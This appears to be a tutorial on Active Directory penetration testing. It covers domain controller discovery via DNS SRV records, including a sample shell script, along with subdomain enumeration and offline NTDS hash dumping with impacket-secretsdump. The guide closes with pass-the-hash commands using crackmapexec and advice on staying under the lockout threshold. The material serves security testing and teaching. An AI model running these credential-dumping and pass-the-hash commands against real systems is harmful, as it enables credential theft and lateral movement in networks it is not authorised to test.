Introduction
Microsoft’s Active Directory (AD) is the backbone of Windows domain networks. AD penetration testing is critical for discovering and mitigating security threats. In this book, we’ll look at several Active Directory penetration testing approaches, commands, and samples.
Enumeration
From Outside
Domain Controllers Discovery
To discover Domain Controllers using DNS, query the domain's own DNS server (normally a DC itself) for the zone. Note that many DNS servers now refuse ANY queries and return a minimal answer (RFC 8482); the _ldap._tcp.dc._msdcs.<domain-name> SRV record is the authoritative list of DCs, since every DC registers itself there with its LDAP port:
dig @<target-ip> <domain-name> any
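The SRV-based lookup in working form, as an added example that is not code from the original page: it queries the DC SRV record, orders the answers the way a domain client would, and resolves each DC to an address. The domain corp.example.local, the hosts dc01/dc02, the server 10.10.10.5 and the sample dig output are constructed placeholders.

```shell
#!/bin/sh
# Added example; not code from the original page. Locates Domain Controllers
# through the _ldap._tcp.dc._msdcs.<domain> SRV record, which every DC registers,
# rather than an ANY query that many DNS servers refuse (RFC 8482).
# corp.example.local, dc01/dc02, 10.10.10.5 and the sample records are constructed.

# Ask the given DNS server for the DC SRV record.
# dig +short prints one record per line: "<priority> <weight> <port> <host>."
# Usage: dc_srv_query <dns-server-ip> <domain>
dc_srv_query() {
    dig +short @"$1" "_ldap._tcp.dc._msdcs.$2" SRV
}

# Convert dig's SRV lines on stdin into "host:port", one per line, ordered as a
# client would pick them (lowest priority first, higher weight first within a
# priority), with the trailing dot removed from the FQDN.
srv_to_hostports() {
    sort -n -k1,1 -k2,2r | awk '{ sub(/\.$/, "", $4); print $4 ":" $3 }'
}

# Resolve each "host:port" line on stdin to its A records and print
# "host port ip", ready to feed to ldapsearch or crackmapexec.
# Usage: ... | dc_hosts_to_ips <dns-server-ip>
dc_hosts_to_ips() {
    while IFS=: read -r host port; do
        for ip in $(dig +short @"$1" "$host" A); do
            printf '%s %s %s\n' "$host" "$port" "$ip"
        done
    done
}

# Full live pipeline against a real domain.
# Usage: discover_dcs <dns-server-ip> <domain>
discover_dcs() {
    dc_srv_query "$1" "$2" | srv_to_hostports | dc_hosts_to_ips "$1"
}

# Constructed sample of dig +short output, deliberately out of priority order,
# so the ordering/parsing step can be exercised without a live domain.
SAMPLE_SRV='10 100 389 dc02.corp.example.local.
0 100 389 dc01.corp.example.local.'

# Offline demo of the parsing step:  sh thisfile.sh --demo
# Live use:                           discover_dcs 10.10.10.5 corp.example.local
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_SRV" | srv_to_hostports
fi
```

The same pattern works for the other DC-registered services: swap _ldap._tcp.dc._msdcs for _kerberos._tcp.dc._msdcs (port 88) or _gc._tcp (port 3268) to find KDCs and Global Catalog servers.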
Subdomain enumeration with ffuf (ffuf resolves each FUZZ.example.com candidate itself, so this only finds names that both resolve and answer over HTTPS; for virtual hosts sharing one IP, fuzz the Host header instead):
ffuf -u https://FUZZ.example.com -w subdomains.txt -mc 200,301,302,403
Using gobuster for DNS:
gobuster dns -d example.local -w subdomains.txt -t 25
Dumping Password Hashes
Use impacket-secretsdump to extract password hashes. The offline (LOCAL) form needs a copy of ntds.dit together with the SYSTEM registry hive, which holds the boot key used to decrypt it; a running DC keeps ntds.dit locked, so both are normally obtained from a Volume Shadow Copy or an ntdsutil IFM export. With -outputfile hashes the NTLM hashes are written to hashes.ntds, one account per line in the form domain\user:rid:lmhash:nthash:::, so cut -d: -f3,4 leaves lmhash:nthash, which crackmapexec accepts for pass-the-hash. Each failed pass-the-hash attempt counts as a bad password against the lockout threshold, so pair an account with its own hash rather than trying every hash in the file against one username:
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL -outputfile hashes
cut -d: -f3,4 hashes.ntds > hashes.txt
crackmapexec smb <target-ip> -u <username> -H hashes.txt